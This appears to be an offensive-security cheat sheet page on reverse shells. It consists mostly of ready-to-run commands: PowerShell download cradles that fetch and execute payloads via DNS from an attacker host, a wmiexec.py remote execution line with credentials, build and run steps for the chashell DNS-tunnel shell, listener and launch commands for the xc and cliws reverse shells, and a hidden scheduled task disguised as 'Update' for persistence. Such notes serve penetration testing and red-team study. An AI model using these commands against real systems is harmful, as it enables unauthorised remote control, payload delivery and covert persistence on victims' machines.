Reverse Shells

PowerShell

Download Cradles

PowerShell DNS Delivery

'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'

wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'

Transport over DNS

dnscat2

chashell

https://github.com/sysdream/chashell

Buy and configure DNS (e. g., example.com):

A * -> <IP>
A @ -> <IP>
A chashell -> <IP>
NS c -> chashell.example.com

Get dependencies:

$ export GOPATH=/home/user/code/go
$ export PATH=$GOPATH:$GOPATH/bin:$PATH
$ go get -v -u github.com/golang/dep/cmd/dep
$ go get github.com/mitchellh/gox
$ cd $GOPATH/src/github.com/golang/dep
$ go install ./...

Clone chashell into $GOPATH/src (otherwise, dep will error out):

$ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell
$ cd $GOPATH/src/chashell

Build binaries:

$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.example.com
$ make build-all OSARCH="linux/amd64"

Run server on Attacker:

$ cd release/
$ sudo systemctl stop systemd-resolved
$ sudo ./chaserv_linux_amd64

Run client on Victim:

$ ./chashell_linux_amd64

Tools

VbRev

https://github.com/VbScrub/VbRev

xc

https://github.com/xct/xc

Listen:

$ rlwrap ./xc -l -p 443

Launch:

PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443"

cliws

https://github.com/b23r0/cliws

Reverse mode:

$ rlwrap -cAr ./cliws -l 8000
Cmd > .\cliws.exe -r ws://10.10.13.37:8000 powershell

Create a scheduled task for persistence:

$ while true; do sudo netstat -tulpan | grep LISTEN | grep 8080 > /dev/null || rlwrap -cAr ./cliws -l 8080; done

$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 1)
$settings = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Queue
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden C:\Windows\Tasks\cliws.exe -r ws://10.10.13.37:8080 powershell"
Register-ScheduledTask -TaskName "Update" -Trigger $trigger -Settings $settings -Action $action

Last updated 4 months ago

hashtagPowerShell

hashtagDownload Cradles

hashtagPowerShell DNS Delivery

hashtagTransport over DNS

hashtagdnscat2

hashtagchashell

hashtagTools

hashtagVbRev

hashtagxc

hashtagcliws